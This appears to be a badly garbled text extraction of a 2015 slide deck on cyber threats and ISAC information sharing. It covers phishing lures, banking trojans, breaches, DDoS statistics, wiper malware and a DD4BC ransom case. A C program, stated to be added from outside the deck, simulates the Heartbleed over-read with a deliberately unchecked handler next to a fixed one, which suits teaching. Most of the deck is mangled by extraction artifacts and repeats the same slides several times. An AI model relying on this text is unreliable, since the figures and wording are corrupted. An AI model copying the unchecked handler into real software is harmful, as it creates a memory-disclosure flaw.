• Shipping themes: DHL, FedEx, UPS, EZ Pass
• Bank phish – Swift transfer
• Dhgate invoice
• eFax
• Salesforce
• Reward themes
• Airline – Delta
• WhatsApp – "You've got a voicemail"

Malware – Banking Trojans: Top Trojans Seen

• Citadel
• Kronos
• Kuluoz – Asprox
• Carberp
• Zeus
• Zberp – hybrid
• GameOver Zeus (GOZ) – P2P (arj) 9/14
• Cridex – Bugat, Feodo, Dridex
• Dyre
• Shylock – July 2014 takedown

Dyre Spreads Like A Global Virus…

• June 2014 – UK, US
• September 2014 – Salesforce.com attacked
• October 2014 – Romania, Germany and Switzerland
• November 2014 – over 100 firms targeted
• December 2014 – Australia and China

Delivery Mechanisms – Drive-by Downloads and Watering Holes

Forbes.com, Energystar.com, AusPost-tracking.com, VA.gov, NBC.com – Citadel 2013

Vulnerability Scanning

• Port scans – open ports
• Vulnerability scans – WordPress, Joomla, Java, Flash, OpenSSL
• Infrastructure

Vulnerabilities

• OpenSSL/Heartbleed – old vulnerability – allows more data than allowed to be read – website vulnerability – banks took the rap unfairly
• GNU Bash/Shellshock – old vulnerability (1994) – Unix-based: Linux, Apple Mac OS X – went public Wednesday 9/24 – exploits and scanning seen almost immediately
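An added illustration, not from the deck, of the bug class behind the Heartbleed bullet ("allows more data than allowed to be read"): a toy heartbeat handler that trusts the length field inside the message, beside one that checks that length against the record actually received, which is the check the fix added. The record layout is simplified from RFC 6520; the function names, the simulated memory buffer and the "secret" are constructed for this demo and are not OpenSSL code.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Toy heartbeat record, simplified from RFC 6520:
 *   [type: 1 byte][payload_length: 2 bytes, big-endian][payload][padding >= 16]
 * Everything here is a constructed simulation, not OpenSSL code. */
#define HB_HDR_LEN 3
#define HB_PAD_LEN 16
#define MEM_SIZE   128
#define OUT_CAP    64

/* Simulated process memory. The received record is written at the start and
 * an unrelated secret is placed in the bytes right after it, standing in for
 * whatever other data happened to sit next to the record in the real bug. */
static uint8_t g_memory[MEM_SIZE];
static const char g_secret[] = "SESSION-KEY-0xC0FFEE";   /* constructed value */

/* Build a record that *claims* `claimed` payload bytes but *carries* only
 * `actual` bytes. Returns the true on-the-wire length of the record. */
size_t build_record(uint16_t claimed, size_t actual) {
    size_t max_actual = MEM_SIZE - HB_HDR_LEN - HB_PAD_LEN - sizeof g_secret;
    if (actual > max_actual) actual = max_actual;
    memset(g_memory, 0, sizeof g_memory);
    g_memory[0] = 1;                                /* heartbeat_request */
    g_memory[1] = (uint8_t)(claimed >> 8);
    g_memory[2] = (uint8_t)(claimed & 0xff);
    memset(g_memory + HB_HDR_LEN, 'A', actual);     /* the payload really sent */
    size_t rec_len = HB_HDR_LEN + actual + HB_PAD_LEN;
    memcpy(g_memory + rec_len, g_secret, sizeof g_secret);  /* neighbouring data */
    return rec_len;
}

/* Vulnerable form: echoes `claimed` bytes without asking whether the record
 * it received is that long, so the copy runs past the record into whatever
 * memory follows it. Returns the number of bytes placed in `out`. */
size_t heartbeat_reply_unchecked(const uint8_t *rec, size_t rec_len,
                                 uint8_t *out, size_t out_cap) {
    (void)rec_len;                                  /* the bug: never consulted */
    uint16_t claimed = (uint16_t)(((unsigned)rec[1] << 8) | rec[2]);
    if (claimed > out_cap) return 0;                /* keeps this toy inside g_memory */
    memcpy(out, rec + HB_HDR_LEN, claimed);
    return claimed;
}

/* Fixed form: header + claimed payload + minimum padding must fit inside the
 * record that actually arrived; otherwise the request is silently dropped. */
size_t heartbeat_reply_checked(const uint8_t *rec, size_t rec_len,
                               uint8_t *out, size_t out_cap) {
    if (rec_len < HB_HDR_LEN + HB_PAD_LEN) return 0;          /* too short to be valid */
    uint16_t claimed = (uint16_t)(((unsigned)rec[1] << 8) | rec[2]);
    if ((size_t)HB_HDR_LEN + claimed + HB_PAD_LEN > rec_len) return 0;  /* the missing check */
    if (claimed > out_cap) return 0;
    memcpy(out, rec + HB_HDR_LEN, claimed);
    return claimed;
}

/* Returns 1 if the neighbouring secret appears anywhere in the reply, else 0. */
int reply_leaks_secret(const uint8_t *out, size_t out_len) {
    size_t n = strlen(g_secret);
    for (size_t i = 0; i + n <= out_len; i++)
        if (memcmp(out + i, g_secret, n) == 0) return 1;
    return 0;
}

/* Run one constructed case through either handler.
 * Returns -1 if the request was dropped (no reply), 1 if the reply contained
 * the neighbouring secret, 0 if the reply was clean. */
int run_case(uint16_t claimed, size_t actual, int use_check) {
    uint8_t out[OUT_CAP];
    size_t rec_len = build_record(claimed, actual);
    size_t n = use_check
        ? heartbeat_reply_checked(g_memory, rec_len, out, sizeof out)
        : heartbeat_reply_unchecked(g_memory, rec_len, out, sizeof out);
    if (n == 0) return -1;
    return reply_leaks_secret(out, n);
}

int main(void) {
    /* A record claiming 40 payload bytes while carrying 4 */
    printf("unchecked handler: %d (1 = reply carried the secret)\n", run_case(40, 4, 0));
    printf("checked handler:   %d (-1 = request dropped)\n", run_case(40, 4, 1));
    /* A well-formed record: claimed length matches what was sent */
    printf("checked, well-formed: %d (0 = clean reply)\n", run_case(4, 4, 1));
    return 0;
}
```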

      

   

Breaches – Malware: ChewBacca, Dexter, BlackPOS, Backoff

• Target – 70 million – 2013
• OPM – 21.5 million
• Premera BCBS – 11.2 million
• Community Health Systems – 4.5 million
• Anthem BCBS – 80 million
• Sony / Hacking Team

2015 Breaches Identified by the ITRC as of 8/11/2015

• Total breaches: 5,500 approx.
• Total records exposed: 818,004,561
• Source: Identity Theft Resource Center

DDoS

• Sony PlayStation – Lizard Squad
• Operation Ababil
• Las Vegas – gaming industry
• Israel
• DD4BC
• World Cup

Q1 2015 Compared to Q4 2014 (Akamai)

• 15% decrease in average attack time
• 35% increase in total DDoS attacks
• 42% increase in SSDP DDoS attacks (routers)
• 22% increase in application-layer DDoS attacks
• 7% decrease in average attack bandwidth (170 Gbps)
• 37% increase in infrastructure-layer DDoS attacks

Wiper Malware

• Shamoon – 2012
  – Attack on 30,000 Saudi Aramco workstations
  – Corrupts files and wipes devices
• South Korean attacks – 2013
  – 2 banks, a media company and an insurance company
  – Patch systems targeted and used to infect
  – Wiped Windows, Linux and UNIX OS
• Las Vegas casino – 2014
  – Wiped and destroyed files with VB bomb
• Sony – 2014
  – SMB worm tool: listening implant, backdoor, proxy tool, destructive hard drive tool, destructive targeted cleaning tool, network propagation wiper
  – Financial data destroyed; financial system still inoperable – asks for delay in filing

The Media and Vendors

• Malvertising
• Watering holes
• Syrian Electronic Army

Media / Vendor Spin Incidents

• Heartbleed / OpenSSL
• Hedge fund attack – BAE
• Russians attack financial system
• Russians hack 1.4 billion passwords – Hold Security

Other Threats

• Call center – phishing
• Mobile
• Social media – Sony executive on American Airlines
• Industrial control systems – Havex
• Espionage – VirusTotal testing for malware

Case Studies

DDoS – DD4BC

• Since April 2015
• From: DD4BC Team <d4bct[AT]gmail[.]com>
• Subject line: DDOS ATTACK
• Size: 500 Mbps to 50 Gbps
• Duration: up to 1 hour
• Ransom demand: 25-40 BTC

United / NYSE

• NYSE – July 8, 2015: 11:32am; 11:45am chatter; noon definitive word
• United – 8:26am reservation system

United Parcel Service

• USSS, NCCIC and FS-ISAC collaborate to release malware analysis and risk mitigation recommendations
• Shared with Retailers Association
• UPS detected and used to mitigate malware

Questions

Page 28: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

Ransomware

-shy‐Crytolocker-shy‐CryptoWall -shy‐CryptoDefense-shy‐Torrent13 Locker -shy‐Darkleach

Top infecMons USAUCanadaUKIndia Also saw Singapore trend

Delivery Mechanisms PhishingSpearphishing

Court13 NoMce InvoiceStatament13 Shipping Themes DHL Fedex UPS EZ Pass Bank Phish ndash Swigt Transfer Dhgate invoice eFax Salesforce Reward themes Airline ndash Delta13 WhatsApp ndash Yoursquove got13 a voicemail

Malware Banking Trojans Top Trojans13 Seen13

Citadel Kronos Kulouz13 ndash Asprox Carperb13 Zeus13 Zberp13 -shy‐ hybrid13 Game-shy‐over Zeus (GOZ) -shy‐ P2P (arj) 914 Cridex ndash Bugat Feodo Dridex13 DyreShylock ndash July 2014 Takedown

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 29: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

Delivery Mechanisms PhishingSpearphishing

Court13 NoMce InvoiceStatament13 Shipping Themes DHL Fedex UPS EZ Pass Bank Phish ndash Swigt Transfer Dhgate invoice eFax Salesforce Reward themes Airline ndash Delta13 WhatsApp ndash Yoursquove got13 a voicemail

Malware Banking Trojans Top Trojans13 Seen13

Citadel Kronos Kulouz13 ndash Asprox Carperb13 Zeus13 Zberp13 -shy‐ hybrid13 Game-shy‐over Zeus (GOZ) -shy‐ P2P (arj) 914 Cridex ndash Bugat Feodo Dridex13 DyreShylock ndash July 2014 Takedown

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 30: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

Malware Banking Trojans Top Trojans13 Seen13

Citadel Kronos Kulouz13 ndash Asprox Carperb13 Zeus13 Zberp13 -shy‐ hybrid13 Game-shy‐over Zeus (GOZ) -shy‐ P2P (arj) 914 Cridex ndash Bugat Feodo Dridex13 DyreShylock ndash July 2014 Takedown

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 31: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 32: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 33: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 34: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

